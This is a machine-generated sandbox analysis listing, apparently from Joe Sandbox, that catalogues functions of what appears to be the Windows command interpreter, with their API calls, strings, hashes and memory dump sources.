                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset
                                                                                                                    • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                    • API String ID: 2221118986-3416068913
                                                                                                                    • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                    • Instruction ID: 56f4306ffe3eeef21e18e79876044f4c1efe6e873fa5226fe7c02e7276f555c6
                                                                                                                    • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                    • Instruction Fuzzy Hash: 61110A21A0874E80EB50EF11A558279AA70BF84FF5FB44631ED6D473D9DE2CD440C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCBE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcschr
                                                                                                                    • String ID: 2$COMSPEC
                                                                                                                    • API String ID: 1764819092-1738800741
                                                                                                                    • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                    • Instruction ID: dad3247484231f4620d27b32b7f05e5ad35f3121378a2ce9d7bcf6fd313c953c
                                                                                                                    • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                    • Instruction Fuzzy Hash: 52519321E0865B85FFA07F21945037DABB1BF84FAAFA44431DA0D867D5DE2CE940C761
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD2EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4254246844-0
                                                                                                                    • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                                    • Instruction ID: a74fc31d91888e8cbadc97295c7ad9770a56e1494522a9be2ba47df0147e3548
                                                                                                                    • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                                    • Instruction Fuzzy Hash: BE419021A0878A86FA20AF11E458379EFB0FF85F86FA44534DA4D477C5EE3CE441C660
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2643372051-0
                                                                                                                    • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                                    • Instruction ID: 00d76cdc859d30b73c127b88145b515a93b8b4839fd22f50d03a1ba80f74955a
                                                                                                                    • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                                    • Instruction Fuzzy Hash: 76F06761A1974A86E6406F76E444079EAB1FF59FA2BA59234C56D033D0DE3C9444C210
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD5A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_osfhandle$ConsoleMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1591002910-0
                                                                                                                    • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                    • Instruction ID: 78907c7d7005bb37b19433dba7b26aabe8547539148495c338719ea27d304044
                                                                                                                    • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                    • Instruction Fuzzy Hash: 19F06734A09706CBE644AF21E845578FEB0FB89B52FA54138CA0A43350DF3EA405CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DriveType
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 338552980-336475711
                                                                                                                    • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                    • Instruction ID: 1384a2430a5d5666cb4e0709944789bbe6f1b12358afe202fbef5f12508874a6
                                                                                                                    • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                    • Instruction Fuzzy Hash: F9E06D6761864486E720AF60E46106AFBB0FB8DB49FD41525EA8D83724EB3CD249CB18
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD5AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BCCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDA6
                                                                                                                      • Part of subcall function 00007FF789BCCD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDBD
                                                                                                                    • GetConsoleTitleW.KERNELBASE ref: 00007FF789BD5B52
                                                                                                                      • Part of subcall function 00007FF789BD4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD4297
                                                                                                                      • Part of subcall function 00007FF789BD4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD42D7
                                                                                                                      • Part of subcall function 00007FF789BD4224: memset.MSVCRT ref: 00007FF789BD42FD
                                                                                                                      • Part of subcall function 00007FF789BD4224: memset.MSVCRT ref: 00007FF789BD4368
                                                                                                                      • Part of subcall function 00007FF789BD4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD4380
                                                                                                                      • Part of subcall function 00007FF789BD4224: wcsrchr.MSVCRT ref: 00007FF789BD43E6
                                                                                                                      • Part of subcall function 00007FF789BD4224: lstrcmpW.KERNELBASE ref: 00007FF789BD4401
                                                                                                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF789BD5BC7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 346765439-0
                                                                                                                    • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                    • Instruction ID: 88530a8203dc92bb8fa77ee8670fb8708c2c0320cd1dc7d72425bbee2d386035
                                                                                                                    • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                    • Instruction Fuzzy Hash: 9531C720A1D64A46FA24FF11A4585BDEAB1FF89F81FE45431E94E47B85DE3CE402C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD9A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1412018758-0
                                                                                                                    • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                    • Instruction ID: abb47e74f2deeaff718d3b7b7f253e0e815d4a66539a82631076387f0f22c46c
                                                                                                                    • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                    • Instruction Fuzzy Hash: 0FE0ED45F5A60F95FE183F6268491749A647F59F52FE81430DD1D46382EF2CA191C330
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCCD90 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDA6
                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDBD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1357844191-0
                                                                                                                    • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                    • Instruction ID: cfd8712d1361f5e66fae49d95ca13ded6b832166a271b548b27737b374a85609
                                                                                                                    • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                    • Instruction Fuzzy Hash: 23F01D31A1874686EA44AF15F844478FBB5FB89F42BA89434D90E03394DF3DE441C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD4C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: exit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2483651598-0
                                                                                                                    • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                    • Instruction ID: 4dbe998938a1ccde1e2616bbed7b2ae8041d5d92cb94ab31587b1f58dbef165b
                                                                                                                    • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                    • Instruction Fuzzy Hash: 69C0123070464A47EB5C7F312495039AD757B09A12F585438C506812C2DD28D404C210
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD5508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF789BC6F97), ref: 00007FF789BD550C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DefaultLangUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 768647712-0
                                                                                                                    • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                    • Instruction ID: b3e7f2505f8ea5d480374330dc7198940b19325730d0eb0ab99fa22926170989
                                                                                                                    • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                    • Instruction Fuzzy Hash: 51E0C2A2D0A2578AF5553E41604A3B4AD73EB69F83FE44031C60E012C8D92D2841D228
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD2E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2221118986-0
                                                                                                                    • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                    • Instruction ID: 3f443d25ecd08591b5cfbccd7b12d507137f4fd42834ccc0b0fcd27fd9ea5c3f
                                                                                                                    • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                    • Instruction Fuzzy Hash: 0DF0B421B097C941EA409B56B544129A6A1AF88FF0B988330EE7C47BC9DE3CD451C300
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FF789BC5B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                                                    • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                                                    • API String ID: 1388555566-2647954630
                                                                                                                    • Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                                                                                                    • Instruction ID: ed684149586c7772f909d9698dac3cba69d6f075b2ad4330e21b268a3fc0d939
                                                                                                                    • Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                                                                                                    • Instruction Fuzzy Hash: 15A2A131A08B8A86E710AF65A4141BDBFB5FB89F96FA08135DA0E47795DF3CE404C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCE680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
